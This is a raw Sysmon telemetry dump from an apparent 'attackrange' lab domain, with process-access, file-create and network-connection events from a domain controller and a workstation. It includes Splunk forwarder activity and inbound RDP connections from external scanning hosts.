15:00:04.980{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.980{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.980{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.980{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC74-607E-730F-00000000BB01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.980{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC74-607E-730F-00000000BB01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.981{A7A01FEF-EC74-607E-730F-00000000BB01}5436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.902{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB2E1D9B638A3C39154A94838B94CD2F,SHA256=CF2839BFB3F65DEC5C80E45A877DB7BC0CB76CBBA34EFB36E71DC23B52D2E32B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.464{A7A01FEF-EC74-607E-720F-00000000BB01}71205652C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000082264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.324{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1989243AEAD3E61F8FA588536195EDA,SHA256=F8C123EFE3FE8C16A8E70A2FDE91ED9355547050981085770BD7820497DB0AD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050981Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:04.901{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65500088A048C98F9E3DBE0B357682BE,SHA256=A98E0E2156C80E68061EBD448AC16E88F6715FA38685A1B59D922C2F0F522421,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.308{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC74-607E-720F-00000000BB01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.308{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.308{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.308{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.308{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.308{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC74-607E-720F-00000000BB01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.308{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC74-607E-720F-00000000BB01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.309{A7A01FEF-EC74-607E-720F-00000000BB01}7120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000082255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.753{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53488-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:02.154{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57665-false10.0.1.12-8000- 354300x800000000000000050980Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:02.448{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51989-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:05.917{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2AC2E4625317B7F129BCC369D052D3B2,SHA256=C5621CE23139801CD7C000789BBDAE80FEC0E7A9CAC75D84AC0BBD147D2F6A54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:05.339{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57F77AC66E555F10D94CEB65D1D880D0,SHA256=A1CE2F5F3B16143FB2E2F5D29580660B5071956AFE805F1F7A08DBC272B42B3A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:05.136{A7A01FEF-EC74-607E-730F-00000000BB01}54361144C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050982Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:05.901{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78CC79C8B15DCD68DC1E88F4B0B6B4A7,SHA256=8D427AE61082FE65835EF1982868C94087CCDBD81D55549E08ECCE9A0932ADA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:06.402{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5139460ADBB8ACD217EAB7A4EBED85B5,SHA256=9BBD0272DF48447DFF8C0BE27D5F8AD3616A649E4E01DBF90AFDE823717F4B02,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.951{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com54733-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.251{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52130-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000082278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:04.216{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54846-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000050985Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:06.905{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64BD4F100F426A59C96B22C5C81744D9,SHA256=6765E9BC72C35123052FBE9D14CBE0E19FFBA08D3FC2F724B22FCC88EB2BE8A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050984Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:06.280{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0905672B3DDAFE4DFDE64DB29B5C23B,SHA256=1E2AA8BD77D79F2FF1962C4026799AC905FF0DAEE46DE02A473C75EB4A2F407E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050983Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 15:00:03.280{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57812-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000082293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.417{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C378C408E6BC1700BEB9C92D9848CAC3,SHA256=4B8FE6D66AD04127491EE2458C1E564F605C27C0985BDE6CDB51BBCB7DBE4609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.324{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC05417E82461EEC846A265573917D53,SHA256=8ED58311E87C81FCD18BC774FBB4163CB93D0E38BFBFC43EEE0F2AF2ED99B0C8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.292{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC77-607E-740F-00000000BB01}6960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.292{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 15:00:07.292{A7A01FEF-B625-607E-0C00-00000000BB01}6686156C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 